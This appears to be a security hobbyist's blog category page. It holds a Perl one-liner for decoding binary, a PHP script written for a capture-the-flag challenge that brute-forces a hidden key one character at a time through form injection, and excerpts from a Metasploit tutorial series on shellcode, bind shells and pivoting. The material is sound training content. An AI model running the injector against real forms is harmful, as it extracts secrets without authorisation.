Category: Tools

Reversing Binary on Command Line

Just throwing this here in case it’s useful to someone else… I often come across binary in challenges that needs to be reversed, and don’t always have a quick tool available.  Assuming you have Perl installed, it’s a straightforward conversion (this assumes 8 bit, zero-padded data):

echo 01000001 01000010 01000011 01000100 | perl -lape '$_=pack"(B8)*",@F'
ABCD

Good hunting. 🙂

Quick PHP Injector

Just posting this for anyone that may need something similar in the future.  The below is my quick code that I use to brute force/programmatically assess form injection.  I wrote it when working through (CTF NAME REDACTED).  If it helps, enjoy.  Please attribute appropriately if you repurpose it, however.

// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08

// This version assumes basic authentication and POST method
$options = array(
     'http' => array(
          'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
          'method' => 'POST',
          'content' => http_build_query($testpush)
     )
);

// Build the context for the request using all of the above
$context = stream_context_create($options);

// Actually submit it
$result = file_get_contents($url, false, $context);

// Check for a failed connection state (just in case)
if ($result === FALSE) {
     print "Failed to connect\n\n";
} else {
// Look for "INDICATOR" which indicates successful injection and return based upon that...
     if (preg_match("/INDICATOR/", $result)) {
          return $trialdata;
     } else {
          return null;
     }
}

// Zeroize the recovery key
$recoverkey = '';

// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));

// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
foreach ( range(1, $loopcount) as $looper ) {
     $breakflag = 'FALSE';
     foreach( $allchars as $onechar) {
          // Bypass method to avoid unnecessary tries
          if ($breakflag === 'FALSE') {
               // We need to track the single character separately from the injection test
               // so the below builds the test portion
               $testkey = $recoverkey . $onechar;
               // Check it using the above function
               $poscheck = post_data($testkey);
               // If we didn't get null, it was good... let me know!
               if ($poscheck !== null) {
                    $breakflag = 'TRUE';
                    $recoverkey .= $onechar;
                    echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
               } else {
                    // I just like to see that it's still working
                    echo ".";
               }
          }
     }
}

// Once we've reached the full number of characters, break and print the key
print "Found key of: " . $recoverkey . "\n\n";
?>

 

Metasploit Fundamentals (4 of 5) – Metasploit Dynamic Shellcode Generation

This is the fourth in a five part series on the fundamentals of Metasploit that I wrote back in 2014.  While some of the specifics have changed over time, the series still provides a good overview for the new user of Metasploit.

Links to all of the articles are listed below:

Overview

If you’ve been following this series of articles, by this point you are familiar with the tools that the Metasploit Framework provides, know your way around the Metasploit Consolse, can select, use, and control an exploit, and turn compromised systems into private routers or forwarders at will.

Obviously that’s a good start, but what about those situations in which using a pre-built exploit just won’t work? Say for instance that we’ve found a website on a system that allows us to upload a file, and doesn’t filter that file at all?

Surely there’s a way to generate some shellcode dynamically to do what we want, in the format we want, right? For instance, if we find a web server that uses ASPX and which allows us to upload our personal profile picture, but doesn’t restrict that upload in any way (e.g. lets us upload an ASPX script)? It sure would be cool if the Metasploit Framework had a way for us to create a bind shell (for instance) in ASPX on a specified port for just this purpose, wouldn’t it?

Well, strap into your seat because we’re about to do just that.

Continue reading “Metasploit Fundamentals (4 of 5) – Metasploit Dynamic Shellcode Generation”

Metasploit Fundamentals (3 of 5) – Pivoting with Metasploit

This is the third in a five part series on the fundamentals of Metasploit that I wrote back in 2014.  While some of the specifics have changed over time, the series still provides a good overview for the new user of Metasploit.

Links to all of the articles are listed below:

Overview

If you’ve been following along so far with these articles you have learned about the tools and features that are included with the Metasploit Framework, and possibly even compromised a test system and opened a Meterpreter session.  This article will discuss a common next step after the initial compromise: pivoting to an internal network.

Continue reading “Metasploit Fundamentals (3 of 5) – Pivoting with Metasploit”

Metasploit Fundamentals (2 of 5) – The Metasploit Console

This is the first in a five part series on the fundamentals of Metasploit that I wrote back in 2014.  While some of the specifics have changed over time, the series still provides a good overview for the new user of Metasploit.

Links to all of the articles are listed below:

Overview

In this article we are going to take a look at the most frequently used component of the Metasploit Framework: the Metasploit Console.  While you can certainly get to everything in the console from direct command line access, when you are first starting up you’ll likely want something to help you navigate through all the options that Metasploit has, find settings, configure exploits, manage sessions.  If you haven’t read Part 1 of this series, Metasploit Overview and Tools, it is highly recommended that you do so at this time to get a base familiarity with the terms and concepts that we will be discussing here.

Continue reading “Metasploit Fundamentals (2 of 5) – The Metasploit Console”

Metasploit Fundamentals (1 of 5) – Metasploit Overview and Tools

This is the first in a five part series on the fundamentals of Metasploit that I wrote back in 2014.  While some of the specifics have changed over time, the series still provides a good overview for the new user of Metasploit.

Links to all of the articles are listed below:

Overview

This series of articles is written for the novice hacker or information security professional who is just getting started with Metasploit.  Odds are that you’ve heard about it previously; every news article that talks about a new exploit invariably mentions something along the lines of “… and there is already a module for it in Metasploit, the hacker’s tool of choice.”  Maybe you’re not sure exactly what Metasploit really can do though, or why it has become a must-have tool to those in our industry.  This article will help you gain that knowledge, and provide the baseline for the remaining four articles in the series.

Continue reading “Metasploit Fundamentals (1 of 5) – Metasploit Overview and Tools”

Website Powered by WordPress.com.

Up ↑